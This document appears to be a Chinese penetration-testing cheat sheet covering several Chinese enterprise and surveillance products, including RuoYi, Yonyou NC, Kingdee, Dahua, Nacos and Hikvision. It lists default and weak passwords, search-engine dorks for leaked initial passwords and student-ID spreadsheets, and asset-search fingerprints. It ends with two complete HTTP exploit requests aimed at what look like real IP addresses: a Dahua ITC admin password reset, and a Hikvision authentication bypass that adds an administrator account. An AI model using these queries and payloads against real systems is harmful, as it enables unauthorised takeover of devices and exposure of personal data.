系统/cms/默认

查询指纹

主要存在漏洞

默认账号密码

默认账号和密码:sysadmin/1

常用密码账号:

用户名:admin/system/test/test1/administrator/百度默认用户名/密码

密码:admin/123456/admin123/Admin@123/test

谷歌语法

site:example.com ("初始密码")&("附件")
site:example.com intext:管理|后台|登陆|用户名|密码|系统|帐号|admin|login|sys|managetem|password|username
site:example.com 奖学金
site:example.com 公示附件

site:lzu.edu.cn filetype:xlsx "学号"

若依

绿若依:"ruoyi" && icon_hash="706913071"

蓝若依:"ruoyi" && (icon_hash="706913071" || icon_hash="-1231872293")

Shiro反序列

弱口令

用友nc

fofa-qeury: title="YONYOU NC"

出现一直处于加载状态路劲后添加: /portal/

时空智友

Fofa:

body="login.jsp?login=null"

Hunter

body="login.jsp?login=null"

Quake

body="login.jsp?login=null"

文件上传

sql注入

金蝶云星空

FOFA语法:app="Kingdee-K3-cloud"

hunter语法:app.name="Kingdee 金蝶云星空"

Quake: favicon: "825af13371930eeb2f85cf075fa25b68"

路径后面直接加:/k3cloud

一般以反序列化命令执行漏洞居多

大华DSS

favicon: "9fa8a9035ce4baa7eee40725b5cfed16"

一般以逻辑漏洞为主

大华 摄像头

弱口令:admin/admin123   admin/admin12345

大华智能物

Fofa:icon_hash="-1935899595"

body="*客户端会小于800*"

逻辑漏洞(密码重置,输入三个1或1,2,3来重置密码)

JustForTest/1

大华智慧园区综合管理平台

fofa语句:app=”dahua-智慧园区综合管理平台”

鹰图语句:web.body=”/WPMS/asset/lib/gridster/“

文件上传

信息泄露

大华DSS数字监控系统

FOFA语法:app="dahua-DSS" 或 icon_hash="2095320044"

信息泄露、strust2漏洞为主

大华itc

hunter: web.body="/itc/login_init.action"

管理员密码重置漏洞,POC如下
POST /admin/services/AdminUserService HTTP/1.1
Host: 61.178.49.133:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
Connection: close
Content-Length: 353
Content-Type: text/xml;charset=UTF-8
X-Requested-With: XMLhttpRequest
Accept-Encoding: gzip

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:tns="http://webservice.dhsoft.com">
   <soapenv:Header/>
   <soapenv:Body>
     <tns:modifyPassword>
        <arg0>
          {"id":"1","loginName":"system","loginPass":"password"}
        </arg0>
     </tns:modifyPassword>
   </soapenv:Body>
</soapeny:Envelope>

Springboot

常见目录:/actuator、/env

Nacos

Fofa:"nacos"或icon_hash="13942501"

弱口令(nacos/nacos)

token绕过登录

海康威视综合安防平台

fofa-query: body="/portal/skin/isee/redblack/"

POST /isupm/api/..;/user/addUserWithRole HTTP/1.1
Host: 60.165.152.14:543
User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:20.0) Gecko/20121202 Firefox/20.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/json
userId: admin
Content-Length: 517

{
  "groupId": "usergroup000",
  "userName": "administrator",
  "userLevel": 5,
  "pwd": "983605f69b7a3a91187eb301eda62bbde9513ea706821b3e93ccdadbfe055b88",
  "personIndexCode": null,
  "personName": "",
  "salt": "c4ca4238a0b923820dcc509a6f75849b",
  "description": "",
  "extendedAttribute": {},
  "roleIds": "4",
  "mac": "",
  "userExtInfos": [],
  "pwdLevel": 2,
  "userRegionInfo": {
    "adds": [{ "indexCode": "", "nodeType": "" }],
    "dels": [{ "indexCode": "", "nodeType": "" }]
  },
  "userExpire": ""
}



// 添加用户名为administrator,密码为    “P@ssw0rd0.”    的用户